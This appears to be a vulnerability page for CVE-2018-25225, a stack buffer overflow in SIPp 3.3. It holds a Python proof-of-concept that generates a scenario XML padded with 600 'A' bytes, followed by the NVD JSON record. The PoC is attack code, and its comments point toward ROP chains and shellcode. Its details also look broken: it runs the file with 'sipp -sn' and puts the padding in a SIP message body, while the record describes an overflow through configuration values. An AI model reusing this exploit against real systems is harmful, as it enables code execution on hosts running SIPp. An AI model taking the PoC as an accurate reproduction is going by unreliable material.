CVE-2018-25225

import sys # PoC for CVE-2018-25225 - SIPp Stack Buffer Overflow # This script generates a malicious SIPp scenario XML file. # Usage: python3 poc.py # Then run: sipp -sn cve_2018_25225_poc.xml def generate_poc_xml(filename): # 1. Construct the payload # The buffer size is typically small (e.g., 256 bytes). # We fill it with 'A' to crash the application and demonstrate the overflow. # In a real exploit, this would be a specific offset + ROP chain + Shellcode. junk = b"A" * 600 # 2. Create the malicious XML content # The vulnerability is triggered when parsing configuration parameters. # We inject the payload into a field that is copied to the stack without bounds checking. xml_template = f"""<?xml version="1.0" encoding="ISO-8859-1" ?> <!DOCTYPE scenario SYSTEM "sipp.dtd"> <scenario name="CVE-2018-25225 PoC"> <send retrans="500"> <![CDATA[ INVITE sip:[service]@[remote_ip]:[remote_port] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] Max-Forwards: 70 From: sipp <sip:sipp@[local_ip]:[local_port]>;tag=[pid]SIPpTag00[call_number] To: sut <sip:[service]@[remote_ip]:[remote_port]>[tag] Call-ID: [call_id] CSeq: 1 INVITE Contact: sip:sipp@[local_ip]:[local_port] Content-Type: application/sdp Content-Length: [len] v=0 o=user1 53655765 2353687637 IN IP[local_ip_type] [local_ip] s=- c=IN IP[media_ip_type] [media_ip] t=0 0 m=audio [media_port] RTP/AVP 0 a=rtpmap:0 PCMU/8000 {junk.decode('latin-1')} ]]> </send> </scenario> """ # 3. Write the payload to a file try: with open(filename, "w") as f: f.write(xml_template) print(f"[+] PoC file generated successfully: {filename}") print(f"[+] To test, run SIPp with this file.") except IOError as e: print(f"[-] Error writing file: {e}") if __name__ == "__main__": output_file = "cve_2018_25225_poc.xml" generate_poc_xml(output_file)

{"cve": {"id": "CVE-2018-25225", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:03.560", "lastModified": "2026-04-08T19:36:28.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SIPP 3.3 contains a stack-based buffer overflow vulnerability that allows local unauthenticated attackers to execute arbitrary code by supplying malicious input in the configuration file. Attackers can craft a configuration file with oversized values that overflow a stack buffer, overwriting the return address and executing arbitrary code through return-oriented programming gadgets."}, {"lang": "es", "value": "SIPP 3.3 contiene una vulnerabilidad de desbordamiento de búfer basado en pila que permite a atacantes locales no autenticados ejecutar código arbitrario al proporcionar entrada maliciosa en el archivo de configuración. Los atacantes pueden crear un archivo de configuración con valores sobredimensionados que desbordan un búfer de pila, sobrescribiendo la dirección de retorno y ejecutando código arbitrario a través de gadgets de programación orientada a retorno."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sipp_project:sipp:3.3:*:*:*:*:*:*:*", "matchCriteriaId": "3FBF1F22-7193-46A9-BB88-DF50967B2193"}]}]}], "references": [{"url": "http://sipp.sourceforge.net/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/45288", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/sipp-stack-based-buffer-overflow-via-configuration-file", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}